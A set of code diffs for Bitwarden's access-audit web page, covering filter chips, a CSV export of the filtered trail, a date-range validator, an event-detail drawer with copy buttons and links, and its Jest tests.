+ * through a form control, so these are how the filter predicate reaches each chip's value.
+ */
+const FILTER_KEYS = {
+  kind: "kind",
+  actor: "actor",
+  requester: "requester",
+} as const;
 
 const byLabel = (a: AuditChipOption, b: AuditChipOption) => a.label.localeCompare(b.label);
 
@@ -136,9 +144,7 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
     BadgeModule,
     ButtonModule,
     CalloutModule,
-    ChipFilterComponent,
-    FilterMenuComponent,
-    FilterOptionComponent,
+    FilterMenuModule,
     FormFieldModule,
     HeaderModule,
     LinkModule,
@@ -200,23 +206,19 @@ export class AccessAuditComponent implements OnInit {
    * has bridged the two.
    */
   private readonly members = signal(new Map<string, ResolvedMember>());
-  protected readonly actorControl = new FormControl<string | null>(null);
-  protected readonly requesterControl = new FormControl<string | null>(null);
+
+  protected readonly filterKeys = FILTER_KEYS;
+
+  /**
+   * The filter chips, which own their own selections. Read through the {@link FilterControl} contract
+   * rather than a host bridge: this page is not a filterable surface with rows to facet, it is a few
+   * independent chips over one already-fetched array.
+   */
+  private readonly filterControls = viewChildren(FILTER_CONTROL);
+
   protected readonly fromControl = new FormControl("", { nonNullable: true });
   protected readonly toControl = new FormControl("", { nonNullable: true });
 
-  /**
-   * The Event chip. `bit-filter-menu` is not a `ControlValueAccessor` — it owns its selection and
-   * publishes it as a signal, so the filter reads the chip directly rather than a form control
-   * bound to it.
-   */
-  private readonly kindMenu = viewChild(FilterMenuComponent);
-
-  private readonly kindValue = computed(() => (this.kindMenu()?.value() ?? null) as string | null);
-  private readonly actorValue = toSignal(this.actorControl.valueChanges, { initialValue: null });
-  private readonly requesterValue = toSignal(this.requesterControl.valueChanges, {
-    initialValue: null,
-  });
   private readonly fromValue = toSignal(this.fromControl.valueChanges, { initialValue: "" });
   private readonly toValue = toSignal(this.toControl.valueChanges, { initialValue: "" });
 
@@ -242,13 +244,13 @@ export class AccessAuditComponent implements OnInit {
       ? { invalidDateRange: { message: this.i18nService.t("invalidDateRange") } }
       : null;
 
-  protected readonly kindOptions = computed(() =>
+  protected readonly kindOptions = computed<AuditChipOption[]>(() =>
     [...new Set(this.rows().map((row) => row.kindLabelKey))]
       .map((labelKey) => ({ label: this.i18nService.t(labelKey), value: labelKey }))
       .sort(byLabel),
   );
 
-  protected readonly actorOptions = computed<ChipFilterOption<string>[]>(() => {
+  protected readonly actorOptions = computed<AuditChipOption[]>(() => {
     const rows = this.rows();
     const options = identityOptions(
       rows.filter((row) => !row.automated),
@@ -260,16 +262,23 @@ export class AccessAuditComponent implements OnInit {
     return options.sort(byLabel);
   });
 
-  protected readonly requesterOptions = computed<ChipFilterOption<string>[]>(() =>
+  protected readonly requesterOptions = computed<AuditChipOption[]>(() =>
     identityOptions(this.rows(), "requester").sort(byLabel),
   );
+
+  /** One chip's selection, or null when that chip has none. Single-select, so the value is a scalar. */
+  private selectedValue(key: string): string | null {
+    const control = this.filterControls().find((candidate) => candidate.key() === key);
+    const value = control?.value();
+    return typeof value === "string" ? value : null;
+  }
 
   protected readonly filteredRows = computed(() => {
     const inverted = this.invertedRange();
     const filter: AuditFilter = {
-      kindLabelKey: this.kindValue(),
-      actorId: this.actorValue(),
-      requesterId: this.requesterValue(),
+      kindLabelKey: this.selectedValue(FILTER_KEYS.kind),
+      actorId: this.selectedValue(FILTER_KEYS.actor),
+      requesterId: this.selectedValue(FILTER_KEYS.requester),
       from: inverted ? null : this.rangeStart(),
       to: inverted ? null : this.rangeEnd(),
     };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -18,10 +18,12 @@ import { NoResults } from "@bitwarden/assets/svg";
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
 import { getUserId } from "@bitwarden/common/auth/services/account.service";
+import { FileDownloadService } from "@bitwarden/common/platform/abstractions/file-download/file-download.service";
 import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
 import { LogService } from "@bitwarden/common/platform/abstractions/log.service";
 import { getById } from "@bitwarden/common/platform/misc/rxjs-operators";
 import {
+  AsyncActionsModule,
   BadgeModule,
   ButtonModule,
   CalloutModule,
@@ -52,6 +54,7 @@ import {
   toAuditRow,
 } from "./access-audit-row";
 import { AuditApiService } from "./audit-api.service";
+import { AuditExportService } from "./audit-export.service";
 
 type AuditStatus = "loading" | "ready" | "empty" | "error";
 
@@ -117,6 +120,7 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
     CommonModule,
     ReactiveFormsModule,
     RouterLink,
+    AsyncActionsModule,
     BadgeModule,
     ButtonModule,
     CalloutModule,
@@ -140,6 +144,8 @@ export class AccessAuditComponent implements OnInit {
   private readonly route = inject(ActivatedRoute);
   private readonly auditApiService = inject(AuditApiService);
   private readonly nameResolver = inject(AccessNameResolverService);
+  private readonly auditExportService = inject(AuditExportService);
+  private readonly fileDownloadService = inject(FileDownloadService);
   private readonly i18nService = inject(I18nService);
   private readonly logService = inject(LogService);
   private readonly accountService = inject(AccountService);
@@ -295,4 +301,22 @@ export class AccessAuditComponent implements OnInit {
       this.status.set("error");
     }
   }
+
+  /**
+   * Downloads the filtered trail as CSV. An arrow property so `bitAction` can call it detached from the
+   * instance.
+   *
+   * Exports {@link filteredRows}, not {@link rows}: an auditor who narrowed the table to one requester and
+   * one week is asking for that week, and the whole 90-day window would hand them back the events they
+   * deliberately filtered out. The file is built from what the browser already holds — the endpoint takes no
+   * parameters and is not re-read — and every name in it is one this viewer could already read on screen.
+   */
+  protected readonly exportCsv = (): void => {
+    const csv = this.auditExportService.getAuditExport(this.filteredRows());
+    this.fileDownloadService.download({
+      fileName: this.auditExportService.getFileName(),
+      blobData: csv,
+      blobOptions: { type: "text/csv" },
+    });
+  };
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -4,12 +4,13 @@ import {
   Component,
   OnInit,
   computed,
+  effect,
   inject,
   signal,
   viewChild,
 } from "@angular/core";
 import { toSignal } from "@angular/core/rxjs-interop";
-import { FormControl, ReactiveFormsModule } from "@angular/forms";
+import { FormControl, ReactiveFormsModule, ValidatorFn } from "@angular/forms";
 import { ActivatedRoute, RouterLink } from "@angular/router";
 import { map, switchMap } from "rxjs";
 
@@ -61,17 +62,33 @@ const byLabel = (a: AuditChipOption, b: AuditChipOption) => a.label.localeCompar
 /**
  * One chip option per distinct identity in `rows`, labelled the way the cells label it. A row whose identity
  * resolved to neither a name nor an email is skipped rather than offered under its raw id.
+ *
+ * Two members can share a display name, and a menu offering the same words twice would let an auditor read a
+ * filtered half of the trail as the whole of one person's activity. A shared label is therefore qualified with
+ * the identity's email, in the `Name (email)` shape the member pickers already use
+ * (`apps/web/src/app/admin-console/organizations/shared/components/access-selector/access-selector.models.ts`).
+ * Where the trail carries no email for a namesake, the two stay indistinguishable.
  */
 function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): AuditChipOption[] {
-  const labelById = new Map<string, string>();
+  const identities = new Map<string, { label: string; email: string | null }>();
   for (const row of rows) {
     const value = row[`${identity}Id`];
     const label = row[identity];
-    if (value != null && label != null && !labelById.has(value)) {
-      labelById.set(value, label);
+    if (value != null && label != null && !identities.has(value)) {
+      identities.set(value, { label, email: row[`${identity}Email`] });
     }
   }
-  return [...labelById].map(([value, label]) => ({ label, value }));
+  const labelCounts = new Map<string, number>();
+  for (const { label } of identities.values()) {
+    labelCounts.set(label, (labelCounts.get(label) ?? 0) + 1);
+  }
+  return [...identities].map(([value, { label, email }]) => ({
+    value,
+    label:
+      (labelCounts.get(label) ?? 0) > 1 && email != null && email !== label
+        ? `${label} (${email})`
+        : label,
+  }));
 }
 
 /**
@@ -191,11 +208,17 @@ export class AccessAuditComponent implements OnInit {
     return start != null && end != null && end.getTime() < start.getTime();
   });
 
-  /** `bit-error` renders the second element's `message` for any key it does not itself translate. */
-  protected readonly invalidRangeError: [string, { message: string }] = [
-    "invalidDateRange",
-    { message: this.i18nService.t("invalidDateRange") },
-  ];
+  /**
+   * The inverted range as the To control's own error, so the field carries the danger border, `aria-invalid`
+   * and the message that `bit-form-field` already renders for a control in error.
+   *
+   * A validator rather than a `setErrors` call: `setUpControl` re-validates the control whenever the ready
+   * branch is created, which would wipe an imperatively set error.
+   */
+  private readonly invertedRangeValidator: ValidatorFn = () =>
+    this.invertedRange()
+      ? { invalidDateRange: { message: this.i18nService.t("invalidDateRange") } }
+      : null;
 
   /** Event-kind chip options, limited to the labels actually present in the trail, sorted. */
   protected readonly kindOptions = computed(() =>
@@ -234,6 +257,24 @@ export class AccessAuditComponent implements OnInit {
     };
     return this.rows().filter((row) => auditRowMatchesFilter(row, filter));
   });
+
+  constructor() {
+    this.toControl.addValidators(this.invertedRangeValidator);
+
+    // Editing From leaves To's value alone, so nothing else would re-run a cross-field rule. The control is
+    // marked touched on every inverted edit rather than only when the range flips, because
+    // `BitInputDirective.onInput` marks it untouched on each keystroke and
+    // `BitFormFieldControlDirective.hasError` paints nothing on an untouched control — the message would
+    // otherwise blink out mid-edit and stay hidden until the next blur.
+    effect(() => {
+      this.fromValue();
+      this.toValue();
+      this.toControl.updateValueAndValidity();
+      if (this.invertedRange()) {
+        this.toControl.markAsTouched();
+      }
+    });
+  }
 
   async ngOnInit(): Promise<void> {
     await this.load();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.html
@@ -95,7 +95,16 @@
       <div>
         <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "collection" | i18n }}</dt>
         <dd class="tw-m-0 tw-break-words" data-testid="drawer-collection">
-          @if (row.collectionName) {
+          @if (collectionRoute; as route) {
+            <a
+              bitLink
+              id="pam-audit-event-drawer_link_collection"
+              [routerLink]="route"
+              [queryParams]="{ collectionId: row.collectionId }"
+              (click)="closeDrawer()"
+              >{{ row.collectionName }}</a
+            >
+          } @else if (row.collectionName) {
             {{ row.collectionName }}
           } @else {
             <span class="tw-text-muted">—</span>
@@ -143,11 +152,21 @@
         data-testid="drawer-trace"
       >
         <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamAccessRequestTitle" | i18n }}</dt>
-        <dd class="tw-m-0 tw-break-all tw-font-mono tw-text-sm" data-testid="drawer-request-id">
-          @if (row.requestId) {
-            {{ row.requestId }}
+        <dd class="tw-m-0 tw-flex tw-items-center tw-gap-1" data-testid="drawer-request-id">
+          @if (row.requestId; as requestId) {
+            <span class="tw-font-mono tw-text-sm">{{ shortId(requestId) }}</span>
+            <button
+              type="button"
+              bitIconButton="bwi-clone"
+              buttonType="subtleGhost"
+              size="small"
+              id="pam-audit-event-drawer_button_copy-request-id"
+              [appCopyClick]="requestId"
+              showToast
+              [label]="'copyValue' | i18n"
+            ></button>
           } @else {
-            <span class="tw-font-sans tw-text-muted">—</span>
+            <span class="tw-text-muted">—</span>
           }
         </dd>
       </div>
@@ -156,22 +175,40 @@
         <dt class="tw-text-sm tw-font-bold tw-text-muted">
           {{ "pamAccessRequestLeaseTitle" | i18n }}
         </dt>
-        <dd class="tw-m-0 tw-break-all tw-font-mono tw-text-sm" data-testid="drawer-lease-id">
-          @if (row.leaseId) {
-            {{ row.leaseId }}
+        <dd class="tw-m-0 tw-flex tw-items-center tw-gap-1" data-testid="drawer-lease-id">
+          @if (row.leaseId; as leaseId) {
+            <span class="tw-font-mono tw-text-sm">{{ shortId(leaseId) }}</span>
+            <button
+              type="button"
+              bitIconButton="bwi-clone"
+              buttonType="subtleGhost"
+              size="small"
+              id="pam-audit-event-drawer_button_copy-lease-id"
+              [appCopyClick]="leaseId"
+              showToast
+              [label]="'copyValue' | i18n"
+            ></button>
           } @else {
-            <span class="tw-font-sans tw-text-muted">—</span>
+            <span class="tw-text-muted">—</span>
           }
         </dd>
       </div>
 
       <div>
         <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamResolverAccessRule" | i18n }}</dt>
-        <dd class="tw-m-0 tw-break-all tw-font-mono tw-text-sm" data-testid="drawer-rule-id">
-          @if (row.ruleId) {
-            {{ row.ruleId }}
+        <dd class="tw-m-0 tw-break-words" data-testid="drawer-rule">
+          @if (ruleRoute; as route) {
+            <a
+              bitLink
+              id="pam-audit-event-drawer_link_rule"
+              [routerLink]="route"
+              (click)="closeDrawer()"
+              >{{ row.ruleName }}</a
+            >
+          } @else if (row.ruleName) {
+            {{ row.ruleName }}
           } @else {
-            <span class="tw-font-sans tw-text-muted">—</span>
+            <span class="tw-text-muted">—</span>
           }
         </dd>
       </div>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.html
@@ -1,0 +1,180 @@
+<bit-dialog dialogSize="small">
+  <ng-container bitDialogTitle>
+    <span>{{ row.kindLabelKey | i18n }}</span>
+    @if (row.inDoubt) {
+      <span
+        bitBadge
+        variant="warning"
+        class="tw-ms-2"
+        [bitTooltip]="'pamAuditIncompleteTooltip' | i18n"
+        >{{ "pamAuditIncomplete" | i18n }}</span
+      >
+    }
+  </ng-container>
+
+  <ng-container bitDialogContent>
+    <dl class="tw-m-0 tw-flex tw-flex-col tw-gap-4">
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "timestamp" | i18n }}</dt>
+        <dd class="tw-m-0" data-testid="drawer-timestamp">{{ row.occurredAt | date: "long" }}</dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamAuditColumnActor" | i18n }}</dt>
+        <dd class="tw-m-0 tw-break-words" data-testid="drawer-actor">
+          @if (row.automated) {
+            <span class="tw-text-muted">{{ "pamAuditSystem" | i18n }}</span>
+          } @else if (row.actor) {
+            @if (params.actor; as member) {
+              <a
+                bitLink
+                href="#"
+                id="pam-audit-event-drawer_link_actor"
+                (click)="openMemberEvents($event, member)"
+                >{{ row.actor }}</a
+              >
+            } @else {
+              {{ row.actor }}
+            }
+            @if (row.actorEmail && row.actorEmail !== row.actor) {
+              <div class="tw-text-sm tw-text-muted">{{ row.actorEmail }}</div>
+            }
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">
+          {{ "pamAuditColumnRequester" | i18n }}
+        </dt>
+        <dd class="tw-m-0 tw-break-words" data-testid="drawer-requester">
+          @if (row.requester) {
+            @if (params.requester; as member) {
+              <a
+                bitLink
+                href="#"
+                id="pam-audit-event-drawer_link_requester"
+                (click)="openMemberEvents($event, member)"
+                >{{ row.requester }}</a
+              >
+            } @else {
+              {{ row.requester }}
+            }
+            @if (row.requesterEmail && row.requesterEmail !== row.requester) {
+              <div class="tw-text-sm tw-text-muted">{{ row.requesterEmail }}</div>
+            }
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamAuditColumnItem" | i18n }}</dt>
+        <dd class="tw-m-0 tw-break-words" data-testid="drawer-item">
+          @if (row.cipherName && row.cipherId) {
+            <a
+              bitLink
+              href="#"
+              id="pam-audit-event-drawer_link_item"
+              (click)="openCipherEvents($event)"
+              >{{ row.cipherName }}</a
+            >
+          } @else if (row.cipherName) {
+            {{ row.cipherName }}
+          } @else if (row.ruleName) {
+            {{ row.ruleName }}
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "collection" | i18n }}</dt>
+        <dd class="tw-m-0 tw-break-words" data-testid="drawer-collection">
+          @if (row.collectionName) {
+            {{ row.collectionName }}
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamAuditColumnDuration" | i18n }}</dt>
+        <dd class="tw-m-0" data-testid="drawer-duration">
+          @if (row.duration; as duration) {
+            {{ duration.key | i18n: duration.value }}
+          } @else if (row.extendedUntil) {
+            {{ "pamAuditDurationExtendedTo" | i18n: (row.extendedUntil | date: "medium") }}
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamColumnWindow" | i18n }}</dt>
+        <dd class="tw-m-0" data-testid="drawer-window">
+          @if (row.exactWindow) {
+            {{ row.exactWindow }}
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamAuditColumnDetail" | i18n }}</dt>
+        <dd class="tw-m-0 tw-break-words" data-testid="drawer-detail">
+          @if (row.detail) {
+            {{ row.detail }}
+          } @else {
+            <span class="tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div
+        class="tw-border-0 tw-border-t tw-border-solid tw-border-border-base tw-pt-4"
+        data-testid="drawer-trace"
+      >
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamAccessRequestTitle" | i18n }}</dt>
+        <dd class="tw-m-0 tw-break-all tw-font-mono tw-text-sm" data-testid="drawer-request-id">
+          @if (row.requestId) {
+            {{ row.requestId }}
+          } @else {
+            <span class="tw-font-sans tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">
+          {{ "pamAccessRequestLeaseTitle" | i18n }}
+        </dt>
+        <dd class="tw-m-0 tw-break-all tw-font-mono tw-text-sm" data-testid="drawer-lease-id">
+          @if (row.leaseId) {
+            {{ row.leaseId }}
+          } @else {
+            <span class="tw-font-sans tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+
+      <div>
+        <dt class="tw-text-sm tw-font-bold tw-text-muted">{{ "pamResolverAccessRule" | i18n }}</dt>
+        <dd class="tw-m-0 tw-break-all tw-font-mono tw-text-sm" data-testid="drawer-rule-id">
+          @if (row.ruleId) {
+            {{ row.ruleId }}
+          } @else {
+            <span class="tw-font-sans tw-text-muted">—</span>
+          }
+        </dd>
+      </div>
+    </dl>
+  </ng-container>
+</bit-dialog>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.spec.ts
@@ -1,0 +1,319 @@
+import { NO_ERRORS_SCHEMA } from "@angular/core";
+import { ComponentFixture, TestBed } from "@angular/core/testing";
+import { mock, MockProxy } from "jest-mock-extended";
+
+import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
+import { DIALOG_DATA, DialogModule, DialogService, I18nMockService } from "@bitwarden/components";
+
+import { AuditRow } from "../access-audit-row";
+
+import { AuditEventDrawerComponent, AuditEventDrawerParams } from "./audit-event-drawer.component";
+
+const ORGANIZATION_ID = "org-1";
+
+const ADA = { name: "Ada", email: "ada@example.com", organizationUserId: "org-user-1" };
+const GRACE = { name: "Grace", email: "grace@example.com", organizationUserId: "org-user-2" };
+
+/** A fully-populated row, so a test can knock out the one field it is about. */
+function row(overrides: Partial<AuditRow> = {}): AuditRow {
+  return {
+    occurredAt: new Date("2026-08-18T09:00:00.000Z"),
+    kindLabelKey: "pamAuditKindLeaseActivated",
+    actor: "Ada",
+    actorId: "user-1",
+    actorEmail: "ada@example.com",
+    requester: "Grace",
+    requesterId: "user-2",
+    requesterEmail: "grace@example.com",
+    cipherName: "Prod database",
+    cipherId: "cipher-1",
+    collectionName: "Production",
+    ruleName: null,
+    ruleId: "rule-1",
+    detail: "Approved for the incident window.",
+    automated: false,
+    inDoubt: false,
+    requestId: "req-1",
+    leaseId: "lease-1",
+    duration: { key: "pamInboxDuration1Hour", value: null },
+    exactWindow: "18/08/2026, 09:00 – 18/08/2026, 10:00",
+    extendedUntil: null,
+    ...overrides,
+  };
+}
+
+describe("AuditEventDrawerComponent", () => {
+  let fixture: ComponentFixture<AuditEventDrawerComponent>;
+  let dialogService: MockProxy<DialogService>;
+
+  const render = async (overrides: Partial<AuditEventDrawerParams> = {}) => {
+    const params: AuditEventDrawerParams = {
+      row: row(),
+      organizationId: ORGANIZATION_ID,
+      actor: ADA,
+      requester: GRACE,
+      ...overrides,
+    };
+
+    await TestBed.configureTestingModule({
+      imports: [AuditEventDrawerComponent],
+      providers: [
+        { provide: DIALOG_DATA, useValue: params },
+        { provide: DialogService, useValue: dialogService },
+        {
+          provide: I18nService,
+          // I18nMockService throws on an unknown key, so this is every key the pane can render.
+          useValue: new I18nMockService({
+            timestamp: "Timestamp",
+            collection: "Collection",
+            pamAuditColumnActor: "Actor",
+            pamAuditColumnRequester: "Requester",
+            pamAuditColumnItem: "Item",
+            pamAuditColumnDuration: "Duration",
+            pamAuditColumnDetail: "Detail",
+            pamColumnWindow: "Window",
+            pamAccessRequestTitle: "Access request",
+            pamAccessRequestLeaseTitle: "Access",
+            pamResolverAccessRule: "Access rule",
+            pamAuditSystem: "System",
+            pamAuditIncomplete: "Incomplete",
+            pamAuditIncompleteTooltip: "Outcome never confirmed.",
+            pamAuditDurationExtendedTo: "Extended to __$1__",
+            pamInboxDuration1Hour: "1 hour",
+            pamAuditKindLeaseActivated: "Lease activated",
+            pamAuditKindLeaseExtended: "Lease extended",
+            close: "Close",
+          }),
+        },
+      ],
+    })
+      // Stub the dialog shell so these tests exercise the pane's own fields rather than
+      // `bit-dialog`'s chrome, which wants a real DialogRef and a drawer stack to sit in.
+      .overrideComponent(AuditEventDrawerComponent, {
+        remove: { imports: [DialogModule] },
+        add: { schemas: [NO_ERRORS_SCHEMA] },
+      })
+      .compileComponents();
+
+    fixture = TestBed.createComponent(AuditEventDrawerComponent);
+    fixture.detectChanges();
+  };
+
+  beforeEach(() => {
+    dialogService = mock<DialogService>();
+  });
+
+  afterEach(() => {
+    TestBed.resetTestingModule();
+  });
+
+  const field = (name: string): HTMLElement =>
+    fixture.nativeElement.querySelector(`[data-testid="drawer-${name}"]`);
+
+  const text = (name: string) => field(name).textContent!.trim().replace(/\s+/g, " ");
+
+  /** The params the one opened dialog was configured with. */
+  const dialogData = () =>
+    (dialogService.open.mock.calls[0][1] as { data: Record<string, unknown> }).data;
+
+  describe("title", () => {
+    it("titles the pane with the event label", async () => {
+      await render();
+
+      expect(fixture.nativeElement.textContent).toContain("Lease activated");
+    });
+
+    it("carries the in-doubt badge when the outcome never landed", async () => {
+      await render({ row: row({ inDoubt: true }) });
+
+      expect(fixture.nativeElement.querySelector("[bitBadge]").textContent!.trim()).toBe(
+        "Incomplete",
+      );
+    });
+
+    it("carries no badge for an event whose outcome landed", async () => {
+      await render();
+
+      expect(fixture.nativeElement.querySelector("[bitBadge]")).toBeNull();
+    });
+  });
+
+  describe("fields", () => {
+    it("renders the whole timestamp", async () => {
+      await render();
+
+      // `long` carries the seconds and the zone, which is what an auditor correlating two systems needs.
+      expect(text("timestamp")).toContain("2026");
+      expect(text("timestamp")).toContain(":00:00");
+    });
+
+    it("renders each populated field", async () => {
+      await render();
+
+      expect(text("actor")).toContain("Ada");
+      expect(text("requester")).toContain("Grace");
+      expect(text("item")).toBe("Prod database");
+      expect(text("collection")).toBe("Production");
+      expect(text("duration")).toBe("1 hour");
+      expect(text("window")).toBe("18/08/2026, 09:00 – 18/08/2026, 10:00");
+      expect(text("detail")).toBe("Approved for the incident window.");
+      expect(text("request-id")).toBe("req-1");
+      expect(text("lease-id")).toBe("lease-1");
+      expect(text("rule-id")).toBe("rule-1");
+    });
+
+    it("puts each identity's email under their name", async () => {
+      await render();
+
+      expect(field("actor").querySelector("a")!.textContent!.trim()).toBe("Ada");
+      expect(field("actor").querySelector(":scope > div")!.textContent!.trim()).toBe(
+        "ada@example.com",
+      );
+      expect(field("requester").querySelector(":scope > div")!.textContent!.trim()).toBe(
+        "grace@example.com",
+      );
+    });
+
+    // The trail falls back to the email as the display name, and the same address twice reads as a bug.
+    it("does not repeat an email that is already the display name", async () => {
+      await render({ row: row({ actor: "ada@example.com" }), actor: null });
+
+      expect(text("actor")).toBe("ada@example.com");
+    });
+
+    it("falls back to the rule name when the event names no item", async () => {
+      await render({
+        row: row({ cipherName: null, cipherId: null, ruleName: "Production access" }),
+      });
+
+      expect(text("item")).toBe("Production access");
+    });
+
+    // "System" is a value, not an absence: an automated event has an actor, it just is not a person.
+    it("reads System rather than a dash for an automated event", async () => {
+      await render({ row: row({ automated: true }), actor: null });
+
+      expect(text("actor")).toBe("System");
+    });
+
+    it("renders an extension's new end as the duration", async () => {
+      await render({
+        row: row({
+          kindLabelKey: "pamAuditKindLeaseExtended",
+          duration: null,
+          exactWindow: null,
+          extendedUntil: "2026-08-18T12:00:00.000Z",
+        }),
+      });
+
+      expect(text("duration")).toContain("Extended to");
+    });
+  });
+
+  // A pane that dropped its empty rows would read as a different event each time, and an auditor
+  // could not tell "we hold no value for this" from "this pane failed to draw it".
+  describe("absent values", () => {
+    const EMPTY_ROW = row({
+      actor: null,
+      actorId: null,
+      actorEmail: null,
+      requester: null,
+      requesterId: null,
+      requesterEmail: null,
+      cipherName: null,
+      cipherId: null,
+      collectionName: null,
+      ruleName: null,
+      ruleId: null,
+      detail: null,
+      requestId: null,
+      leaseId: null,
+      duration: null,
+      exactWindow: null,
+      extendedUntil: null,
+    });
+
+    it.each([
+      "actor",
+      "requester",
+      "item",
+      "collection",
+      "duration",
+      "window",
+      "detail",
+      "request-id",
+      "lease-id",
+      "rule-id",
+    ])("renders the muted em dash for an absent %s", async (name) => {
+      await render({ row: EMPTY_ROW, actor: null, requester: null });
+
+      expect(text(name)).toBe("—");
+      expect(field(name).querySelector(".tw-text-muted")).not.toBeNull();
+    });
+  });
+
+  describe("entity event history links", () => {
+    it("opens the actor's event history from their name", async () => {
+      await render();
+
+      fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_actor").click();
+
+      expect(dialogService.open).toHaveBeenCalledTimes(1);
+      expect(dialogData()).toEqual({
+        entity: "user",
+        entityId: "org-user-1",
+        organizationId: ORGANIZATION_ID,
+        name: "Ada",
+        showUser: true,
+      });
+    });
+
+    it("opens the requester's event history from their name", async () => {
+      await render();
+
+      fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_requester").click();
+
+      expect(dialogData()).toEqual({
+        entity: "user",
+        entityId: "org-user-2",
+        organizationId: ORGANIZATION_ID,
+        name: "Grace",
+        showUser: true,
+      });
+    });
+
+    it("opens the item's event history from its name", async () => {
+      await render();
+
+      fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_item").click();
+
+      expect(dialogData()).toEqual({
+        entity: "cipher",
+        entityId: "cipher-1",
+        organizationId: ORGANIZATION_ID,
+        name: "Prod database",
+        showUser: true,
+      });
+    });
+
+    // A dead link on an audit surface invites a click that reports nothing.
+    it("leaves an identity the page could not resolve as plain text", async () => {
+      await render({ actor: null, requester: null });
+
+      expect(fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_actor")).toBeNull();
+      expect(
+        fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_requester"),
+      ).toBeNull();
+      expect(text("actor")).toContain("Ada");
+    });
+
+    // There is no entity-events dialog for an access rule.
+    it("leaves a rule-named item as plain text", async () => {
+      await render({
+        row: row({ cipherName: null, cipherId: null, ruleName: "Production access" }),
+      });
+
+      expect(fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_item")).toBeNull();
+    });
+  });
+});

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.spec.ts
@@ -432,7 +432,6 @@ describe("AuditEventDrawerComponent", () => {
       expect(platformUtilsService.copyToClipboard).toHaveBeenCalledWith(id);
     });
 
-    // Nothing to copy, so nothing to offer copying.
     it.each(["request-id", "lease-id"])(
       "offers no copy affordance beside an absent %s",
       async (name) => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.spec.ts
@@ -1,15 +1,27 @@
 import { NO_ERRORS_SCHEMA } from "@angular/core";
 import { ComponentFixture, TestBed } from "@angular/core/testing";
+import { Router, provideRouter } from "@angular/router";
 import { mock, MockProxy } from "jest-mock-extended";
 
 import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
-import { DIALOG_DATA, DialogModule, DialogService, I18nMockService } from "@bitwarden/components";
+import { PlatformUtilsService } from "@bitwarden/common/platform/abstractions/platform-utils.service";
+import {
+  DIALOG_DATA,
+  DialogModule,
+  DialogRef,
+  DialogService,
+  I18nMockService,
+  ToastService,
+} from "@bitwarden/components";
 
 import { AuditRow } from "../access-audit-row";
 
 import { AuditEventDrawerComponent, AuditEventDrawerParams } from "./audit-event-drawer.component";
 
 const ORGANIZATION_ID = "org-1";
+
+const REQUEST_ID = "3a9d5f74-2c18-4c6b-9f0d-71b8e4a2c6d5";
+const LEASE_ID = "b27e4c91-5d3a-4f88-a1c6-90e7d5f2b834";
 
 const ADA = { name: "Ada", email: "ada@example.com", organizationUserId: "org-user-1" };
 const GRACE = { name: "Grace", email: "grace@example.com", organizationUserId: "org-user-2" };
